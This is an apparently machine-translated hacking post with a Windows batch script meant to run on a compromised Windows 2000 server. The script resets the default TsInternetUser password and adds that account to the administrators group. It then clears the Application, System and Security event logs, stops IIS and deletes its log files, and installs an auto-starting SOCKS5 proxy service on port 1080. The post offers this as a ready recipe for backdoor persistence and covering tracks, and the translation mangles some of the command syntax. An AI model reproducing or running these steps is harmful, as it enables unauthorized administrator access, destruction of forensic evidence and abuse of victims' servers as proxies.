Install 3389, SOCKS5, delete logs in one step

xiaoxiao2021-03-05  24

The most effective installation of 3389 terminals, SOCKS5 agents! Delete the log. It's a way to talk about!

First need a few software

The first is SoCKS5 agent written by Snake

The second is Cleaniislog.exe

The third is Winshell

Start operation: Open - Start - Program - Attachment - Notebook

Write:

-------------------------------------------------- -----------------------------

echo off

NET User TsinterNetUser 12345 <- TsinterNetuser is Win2K default user, we change your password

Net localgroup administrators TsinterNetuser / Add <- Add to Super User Group ->

Net use //127.0.0.1/IPC $ "12345" / user: "TsinterNetuser" <- Connect to login, delete logs ->

Cleaniislog.exe -s //127.0.0.1 -l "Application" -C

Cleaniislog.exe -s //127.0.0.1 -l "system" -c

Cleaniislog.exe -s //127.0.0.1 -l "security" -c

NET STOP W3SVC <- Stop IIS, Delete Record ->

DEL C: / Winnt / System32 / logfiles /*.*/ s / f / <- Delete the log under the C on the PV ->

Del D: / Winnt / System32 / logfiles /*.*/ s / f / <- Remove the log under the D disk ->

NET Start W3SVC <- Start IIS, restore the normal work of Web ->

SSS -INSTALL <- Install SOCKS5 Agent ->

SSS -Config StartType 2 <- Automatically runs automatically after the system is started ->

SSS -Config Port 1080 <- Only 1080 port services, you can also replace other ports ->

Net Start Skserver <- Startup Service ->

转载请注明原文地址:https://www.9cbs.com/read-37523.html

New Post(0)